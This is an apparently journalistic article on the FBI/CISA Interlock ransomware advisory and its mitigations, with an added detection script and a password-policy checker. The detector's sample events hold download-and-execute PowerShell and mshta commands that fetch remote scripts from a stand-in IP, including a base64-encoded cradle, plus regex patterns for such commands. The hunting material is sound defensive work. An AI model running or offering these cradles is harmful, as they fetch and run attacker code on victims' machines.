New FBI Warning — Windows And Linux Users Must Apply 2FA Now
Introduction to the Interlock Ransomware Threat
There are some weeks that I almost feel like I have joined the Federal Bureau of Investigation, given the number of alerts that I am exposed to. Within just the last few days, I have shared a warning to 10 million Android users to disconnect their devices, another for all smartphone users as phantom hacker attacks continue, and now comes the FBI recommendation for Windows and Linux users to urgently enable two-factor authentication to complete the cyber-trilogy. Here’s everything you need to know when it comes to mitigating the Interlock ransomware threat.
FBI and CISA Issue Joint Interlock Ransomware Warning
A relatively new ransomware threat is, according to the Cybersecurity and Infrastructure Security Agency, on the rise and targeting both businesses and critical infrastructure providers with double-extortion attacks. A July 22 joint cybersecurity advisory, issued alongside the FBI under alert code AA25-203A, was prompted by ongoing FBI investigations that have identified both indicators of compromise and the tactics, techniques and procedures used by the attackers. “The FBI is aware of Interlock ransomware encryptors designed for both Windows and Linux operating systems,” the alert confirmed.
Although I would heartily recommend reading the full alert for all the technical details, the attacks can be summed up as employing drive-by downloads from compromised legitimate websites and ClickFix social engineering to gain initial access. Once a system has been breached, the attackers deploy credential stealers and keyloggers to harvest account credentials, then use those credentials for the lateral movement and privilege escalation required to exfiltrate data and deploy the ransomware.
Cybersecurity Experts Throw Their Weight Behind the Latest FBI Ransomware Warning
It’s not just the FBI and CISA that have raised the red flag as far as the Interlock ransomware threat is concerned; the cybersecurity industry has also made it clear how dangerous this particular campaign actually is.
“Interlock initially leveraged ClickFix as their primary method of gaining access, but recent reports suggest a transition towards the use of FileFix,” Steven Thomson, a senior security operations center analyst at Barrier Networks, explained, adding that both tools have been observed being used to download and deploy a remote access trojan, which is then moved laterally to key devices in order to establish a foothold within the target environment. Using “throwaway IP addresses” to communicate, the RAT also, according to a Barrier Networks investigation, uses “PowerShell commands to conduct reconnaissance within the victim’s network.” Exfiltrated data is moved into an Azure blob storage container, Thomson said, enabling the attackers to evade detection “by blending in with normal cloud activity.”
Erich Kron, a security awareness advocate at KnowBe4, meanwhile, told me that the use of compromised websites for drive-by malware downloads is “not very common in the world of ransomware,” but that Interlock is working hard to make a name for themselves, so some tactics, such as using social engineering, are most certainly common. “Convincing people to install updates or fixes, really just disguised malware, in ClickFix attacks is not a new concept as fake updates or antivirus notifications have been around for years,” Kron pointed out, and to counter those, organizations should “ensure their employees are aware of the campaigns and are taught to spot them, and that they are aware of the real and legitimate process the organization’s IT department uses to install patches or updates so they are not tricked into executing malware.”
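Both ClickFix and FileFix end the same way on the endpoint: the victim pastes a command into something launched from the Windows desktop, the Run dialog (Win+R) in the ClickFix case or the File Explorer address bar in the FileFix case, so the interpreter that runs the payload is a child of explorer.exe. That parent/child pair, combined with the usual download-and-run switches, is what a SOC can hunt for. The script below is an added example, not code from the article, Barrier Networks, or the FBI/CISA advisory. The events are constructed, Sysmon-style process-creation records; the field names, paths and IP addresses are assumptions for illustration and not Interlock indicators of compromise from the advisory.

```python
"""Flag ClickFix/FileFix-style executions in process-creation events.
Added example with constructed data; not the advisory's IOCs."""
import base64
import binascii
import ntpath
import re

# Interpreters and download utilities typically launched by paste-and-run lures.
LOLBINS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
    "bitsadmin.exe", "curl.exe",
}

# Command-line markers common to "paste this to fix it" payloads.
MARKERS = {
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e\w*\s+bypass", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "remote_fetch": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|\bcurl\b", re.I),
    "url": re.compile(r"https?://", re.I),
    "no_profile": re.compile(r"-nop\b|-noprofile", re.I),
}


def decode_b64_utf16(blob):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE); '' on failure."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return ""
    return raw.decode("utf-16-le", errors="ignore")


def classify(event):
    """Return the list of reasons an event looks like a ClickFix/FileFix
    execution. Empty list means not flagged. A plain PowerShell launched
    from the Start menu also has explorer.exe as parent, so the parent/child
    pair alone is never enough; at least one marker is required."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    if parent != "explorer.exe" or child not in LOLBINS:
        return []
    cmd = event.get("CommandLine", "")
    reasons = []
    haystack = cmd
    m = MARKERS["encoded_command"].search(cmd)
    if m:
        reasons.append("encoded_command")
        # Swap the base64 blob for its decoded text so the remaining markers
        # are matched against what will actually execute.
        haystack = cmd[:m.start(1)] + decode_b64_utf16(m.group(1)) + cmd[m.end(1):]
    for name, rx in MARKERS.items():
        if name != "encoded_command" and rx.search(haystack):
            reasons.append(name)
    return reasons


def scan(events):
    """Return [(index, reasons)] for every flagged event."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]


# Constructed sample events (simplified Sysmon Event ID 1 fields).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "User": r"CORP\jdoe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://203.0.113.7/x.ps1|iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "User": r"CORP\jdoe", "CommandLine": "mshta http://203.0.113.7/verify.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "User": r"CORP\asmith",
     "CommandLine": "powershell -NoProfile -EncodedCommand " + ENCODED},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe", "Image": PS,
     "User": r"CORP\dev1", "CommandLine": "powershell -NoProfile -Command Get-ChildItem"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "User": r"CORP\jdoe", "CommandLine": "notepad.exe todo.txt"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "User": r"CORP\jdoe",
     "CommandLine": "powershell.exe"},   # launched from the Start menu: benign
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {ev['User']}: {', '.join(why)} :: {ev['CommandLine'][:70]}")
```

Only the first three events are flagged; the VS Code terminal, Notepad, and the bare PowerShell window opened from the Start menu all pass. For incident response, the Run dialog keeps its own history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which corroborates a process-creation hit when the user says they “only followed the instructions on the page.”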
Mitigating the Interlock Ransomware Threat — The FBI Recommendations
Prevention is always better than cure, and that is never truer than when applied to the world of cybersecurity. Mitigating a threat is the priority for every security team; nobody wants to be dealing with the fallout of failing to do so. The FBI is aware of this, which is why the cybersecurity alert features a large, red bullet point mitigation table at the top of the advisory. It’s also why it’s the focus of this article.
While the “actions for organizations to take today” list is, of course, extremely valuable, it is not the complete mitigation picture. For that you need to dig deeper into the alert itself. Personally, I would move number four up to number one as well, especially the advice to employ 2FA across accounts, as this is crucial in preventing the lateral movement and privilege escalation that enables a successful ransomware attack.
But anyhoo, let’s explore the full FBI mitigation advice in our own bullet point list, shall we?
- Require multi-factor authentication, or 2FA as many still refer to it, across all services and accounts where possible, but particularly “webmail, virtual private networks, and accounts that access critical systems.”
- Employ web access firewalls and domain name system filtering to block connections to malicious domains, so that the drive-by download or ClickFix payload is never fetched in the first place.
- Ensure all accounts comply with NIST password standards.
- Keep all operating systems, firmware and software up to date through a managed and prioritized patching system.
- Employ network segmentation to prevent lateral movement by adversaries.
- Review domain controllers, servers, workstations, and Active Directory for new or unrecognized accounts.
- Disable unused ports.
- Disable command-line and scripting utilities where they are not required, so as to make it harder for adversaries to escalate privileges and move laterally through the network.
And, as the FBI notes, implement a recovery plan!
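The “NIST password standards” item above is vaguer than the rest, so here is what it means in practice as an added example (not code from the article, the advisory, or NIST). It applies the memorized-secret rules of NIST SP 800-63B Rev. 3: count length in Unicode code points after NFKC normalization, require at least 8 characters, permit at least 64, allow spaces and any printable character, impose no composition rules (no “one upper, one digit, one symbol”), and reject anything on a blocklist of compromised, dictionary, repetitive, sequential or context-specific values such as the username or the service name. The blocklist is a constructed stand-in for a real breach corpus, the 64-character cap and the repetition heuristic are my own assumptions, and the function names are mine.

```python
"""NIST SP 800-63B style password acceptance check. Added example; the
blocklist, cap and heuristics are assumptions, not NIST text."""
import unicodedata

MIN_LEN = 8    # 800-63B: at least 8 code points
MAX_LEN = 64   # 800-63B: at least 64 SHALL be permitted; capping at 64 is an assumption

# Constructed stand-in for a corpus of breached and commonly used passwords.
BLOCKLIST = {
    "password", "p@ssw0rd", "password1", "123456", "12345678", "qwerty",
    "letmein", "welcome1", "iloveyou", "admin123",
}


def normalise(pw):
    """NFKC so that visually equivalent Unicode input is treated identically
    and length is counted in code points of the canonical form."""
    return unicodedata.normalize("NFKC", pw)


def is_repetitive_or_sequential(pw):
    """Heuristic for 'aaaaaaaa', 'abababab', '12345678', 'hgfedcba'."""
    if len(set(pw)) <= 2:
        return True
    steps = {ord(b) - ord(a) for a, b in zip(pw, pw[1:])}
    return steps <= {1} or steps <= {-1}


def check_password(pw, username="", service=""):
    """Return (accepted, reason); reason is '' when accepted.
    Deliberately contains no composition rule: 800-63B drops them."""
    pw = normalise(pw)
    if len(pw) < MIN_LEN:
        return False, "too short"
    if len(pw) > MAX_LEN:
        return False, "too long"
    folded = pw.casefold()
    if folded in BLOCKLIST:
        return False, "on blocklist"
    for ctx in (username, service):
        if ctx and ctx.casefold() in folded:
            return False, "contains context-specific word"
    if is_repetitive_or_sequential(folded):
        return False, "repetitive or sequential"
    return True, ""


if __name__ == "__main__":
    samples = [
        ("correct horse battery staple", "", ""),   # long passphrase, no symbols: accepted
        ("P@ssw0rd", "", ""),                        # passes composition rules, fails blocklist
        ("jdoe-2025!", "jdoe", "vpn"),               # contains the username
        ("abcdefgh", "", ""),                        # sequential
        ("\ufb01nance-team-pw", "", ""),             # 'ﬁ' ligature is normalised to 'fi'
    ]
    for pw, user, svc in samples:
        print(f"{pw!r:32} -> {check_password(pw, user, svc)}")
```

The second sample is the important one: “P@ssw0rd” satisfies every classic complexity rule and is exactly the kind of value a credential stealer finds reused across webmail, VPN and domain accounts. A blocklist check against a real breach corpus catches it; a composition rule does not. Rev. 3 also says not to force periodic rotation unless there is evidence of compromise, which is why no expiry logic appears here.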
Conclusion
The Interlock ransomware threat is a serious concern for Windows and Linux users, and it’s essential to take immediate action to mitigate the risk. By following the FBI’s recommendations, including enabling 2FA, employing web access firewalls, and keeping software up to date, organizations can significantly reduce the risk of a successful attack. It’s crucial to stay vigilant and proactive in the face of emerging threats like Interlock, and to prioritize cybersecurity awareness and education to prevent these types of attacks.
FAQs
Q: What is the Interlock ransomware threat?
A: The Interlock ransomware threat is a relatively new ransomware campaign that targets both businesses and critical infrastructure providers with double-extortion attacks.
Q: How does the Interlock ransomware threat work?
A: The Interlock ransomware threat employs drive-by-downloads and ClickFix social engineering to gain initial access, and then deploys credential stealers and keyloggers to obtain account credentials and execute lateral movement and privilege escalation.
Q: What can organizations do to mitigate the Interlock ransomware threat?
A: Organizations can mitigate the Interlock ransomware threat by enabling 2FA, employing web access firewalls, keeping software up to date, and implementing a recovery plan, among other measures.
Q: Why is it essential to enable 2FA?
A: Enabling 2FA is crucial because the credentials that Interlock’s stealers and keyloggers harvest are only useful for lateral movement and privilege escalation if a password alone is enough to log in; requiring a second factor breaks the steps that enable a successful ransomware attack.
Q: What is the role of cybersecurity awareness and education in preventing Interlock ransomware attacks?
A: Cybersecurity awareness and education play a critical role in preventing Interlock ransomware attacks by teaching employees to spot and report suspicious activity, and to follow best practices for cybersecurity.